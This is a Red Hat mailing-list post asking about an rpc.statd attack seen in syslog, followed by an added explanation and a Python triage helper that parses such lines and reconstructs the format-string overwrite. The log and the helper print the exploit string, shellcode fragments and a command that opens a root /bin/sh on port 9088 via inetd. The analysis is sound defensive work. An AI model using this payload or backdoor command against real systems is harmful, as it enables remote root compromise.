Has anyone seen this type of attack before? I'm not sure just where to start
looking other than CERT, but is it a DoS, or an exploit of a particular
OS/package? Thanks!

Here you go...

Active System Attack Alerts
=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!

Security Violations
=-=-=-=-=-=-=-=-=-=
Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!

Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Nov  3 18:01:00 www CROND[6057]: (root) CMD (run-parts /etc/cron.hourly)
Nov  3 18:10:00 www CROND[6059]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:20:00 www CROND[6061]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:30:00 www CROND[6063]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:40:00 www CROND[6065]: (root) CMD (   /sbin/rmmod -as)
Nov  3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing
'/': ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x
%08x %08x %08x %08x %08x %08x %08x %08x
%0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20ëK^\211v¬\203î

\215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
\210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
-c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
/tmp/m;
Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
Nov  3 23:45:03 www rpc.statd[366]: STAT_FAIL to localhost for SM_MON of
^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
%08x %08x %08x %08x %08x %08x %08x
%0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20ëK^\211v¬\203î

\215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
\210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
-c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
/tmp/m;
Nov  3 18:50:00 www CROND[6067]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:50:41 www rhnsd[6068]: running program /usr/sbin/rhn_check
Nov  3 18:50:43 www rhnsd[766]: command returned:
Nov  3 19:00:00 www CROND[6071]: (root) CMD (/bin/sh
/usr/local/etc/logcheck.sh)
Nov  3 19:00:00 www CROND[6072]: (root) CMD (   /sbin/rmmod -as)


Gavin Durman --- Xavier University LAN System Administrator
=================================================
[EMAIL PROTECTED]     ICQ: 20277424     http://durman.xu.edu
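The two SM_MON lines in the report above carry a classic format-string payload: a block of little-endian stack pointers, fourteen "%08x" pops to walk up the stack, four width-padded "%x"/"%n" pairs that write the running output count into those pointers one byte at a time, a run of 0x90 NOPs (rendered as \220 by syslog), shellcode, and a trailing command that appends a root shell on TCP port 9088 to an inetd config under /tmp/m and starts inetd on it. The following triage helper is an added example, not part of the post above or of any Red Hat or logcheck tool. It parses syslog lines of that shape, flags the indicators, extracts the inetd backdoor spec, and replays the "%n" arithmetic the way a 32-bit vsnprintf would count bytes. The sample line is constructed to mirror the posted one (same pointer block, same directives, a 57-byte sled, the command verbatim); only the first six shellcode bytes are transcribed and the rest is omitted. Two things are assumptions: that the count starts at the beginning of the logged message text (i.e. a vulnerable statd passed "SM_MON request for hostname containing '/': " plus the hostname to syslog() as the format), and that the duplicated pointers exist because each padded "%x" consumes one copy and the following "%n" the other. Under those assumptions the four writes reconstruct to 0xbffff3bc, an i386 Linux user-stack address of the kind a return-address overwrite back into the sled would need. Note that the specifiers appear literally in Gavin's log, so whatever wrote that line did not expand them; the replay shows what an expanding syslog() call would have done.

```python
"""Triage helper for rpc.statd SM_MON lines (added example, constructed input)."""
import re
import struct

# ---- Constructed sample input: mirrors the posted line, not its exact bytes ----
SYSLOG_PREFIX = b"Nov  3 23:45:03 www rpc.statd[366]: "
MSG_PREFIX = b"SM_MON request for hostname containing '/': "
# Eight little-endian 32-bit pointers, 0xbffff704..0xbffff707 each twice. The log
# renders 0x04 0xf7 0xff 0xbf as ^D followed by three Latin-1 characters.
ADDRS = b"".join(struct.pack("<I", a) * 2 for a in range(0xBFFFF704, 0xBFFFF708))
STACK_POP = b"%08x " * 14                    # walks 14 words up the stack
WRITES = b"%0242x%n%055x%n%012x%n%0192x%n"   # four counted one-byte writes
NOP_SLED = b"\x90" * 57                      # shown as \220 in the log
SHELLCODE = b"\xebK^\x89v\xac"               # stand-in: first bytes seen in the log only
CMD = (b'/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; '
       b'/usr/sbin/inetd /tmp/m;')
SAMPLE_LINE = SYSLOG_PREFIX + MSG_PREFIX + ADDRS + STACK_POP + WRITES + NOP_SLED + SHELLCODE + CMD
BENIGN_LINE = SYSLOG_PREFIX + MSG_PREFIX + b"some/host"

SYSLOG_RE = re.compile(
    rb"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    rb"(?P<prog>[^\[ ]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$", re.DOTALL)
# printf conversion: flags, width, optional precision and length modifier, conversion
FMT_RE = re.compile(rb"%(?P<flags>[-+ #0]*)(?P<width>\d*)(?:\.\d+)?(?:hh|h|ll|l)?(?P<conv>[diouxXcspn%])")


def stack_pointers(msg, lo=0xBFF00000, hi=0xC0000000):
    """Distinct little-endian 32-bit values in the i386 Linux user-stack range
    (assumption: 2.x kernel, stack just below 0xc0000000), in order of appearance."""
    seen = []
    for i in range(len(msg) - 3):
        v = struct.unpack_from("<I", msg, i)[0]
        if lo <= v < hi and v not in seen:
            seen.append(v)
    return seen


def simulate_writes(fmt, pointers):
    """Replay fmt as a 32-bit vsnprintf would count output bytes; return
    (target, count) for each %n. The k-th %n is paired with the k-th distinct
    pointer (assumption: each padded %x eats one copy, the %n the other)."""
    count, pos, writes = 0, 0, []
    for d in FMT_RE.finditer(fmt):
        count += d.start() - pos            # literal bytes before this directive
        pos = d.end()
        width = int(d["width"] or 0)
        conv = d["conv"]
        if conv == b"%":
            count += 1
        elif conv == b"n":
            k = len(writes)
            writes.append((pointers[k] if k < len(pointers) else None, count))
        elif conv in b"xX":
            count += max(width, 8)          # a 32-bit value is at most 8 hex digits
        else:
            count += width                  # other conversions: width is only a lower bound
    return writes


def reconstruct_overwrite(writes):
    """Apply each %n as a 4-byte little-endian store and read back the 32-bit value
    at the lowest target; later stores clobber the high bytes of earlier ones,
    which is why the payload steps the targets by one byte each."""
    targets = [t for t, _ in writes if t is not None]
    if not targets:
        return None
    base = min(targets)
    mem = bytearray(max(targets) - base + 4)
    for target, count in writes:
        if target is not None:
            off = target - base
            mem[off:off + 4] = struct.pack("<I", count & 0xFFFFFFFF)
    return struct.unpack_from("<I", mem, 0)[0]


def triage(line):
    """Parse one syslog line; return a report dict, or None if it does not parse."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    msg = m["msg"]
    n_writes = [d for d in FMT_RE.finditer(msg) if d["conv"] == b"n"]
    sled = max((len(r) for r in re.findall(rb"\x90+", msg)), default=0)
    cmd = re.search(rb"/bin/sh -c (.+)$", msg, re.DOTALL)
    inetd = re.search(rb"(\d+) stream tcp nowait (\w+) (\S+)", msg)
    report = {
        "prog": m["prog"].decode(), "pid": int(m["pid"]),
        "percent_n": len(n_writes),
        "stack_pops": len(re.findall(rb"%08x", msg)),
        "nop_sled": sled,
        "pointers": stack_pointers(msg),
        "command": cmd.group(1).decode("latin-1") if cmd else None,
        "backdoor": ({"port": int(inetd[1]), "user": inetd[2].decode(),
                      "service": inetd[3].decode()} if inetd else None),
    }
    report["suspicious"] = report["percent_n"] > 0 or sled >= 16 or cmd is not None
    if n_writes and report["pointers"]:
        report["writes"] = simulate_writes(msg, report["pointers"])
        report["overwrite_value"] = reconstruct_overwrite(report["writes"])
    return report


if __name__ == "__main__":
    for line in (SAMPLE_LINE, BENIGN_LINE):
        r = triage(line)
        ov = r.get("overwrite_value")
        print(r["suspicious"], r["percent_n"], r["nop_sled"], r["pointers"],
              hex(ov) if ov is not None else None, r["backdoor"])
```

Running it on the constructed line reports four "%n" writes with running counts 444, 499, 511 and 703, which land as the bytes bc f3 ff bf at 0xbffff704..07 and read back as 0xbffff3bc; the benign line parses but is not flagged. The port, user and service fields come straight out of the inetd.conf-style entry in the payload, which is the quickest thing to check for on the host: whether /tmp/m exists and whether anything is listening on 9088.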



_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list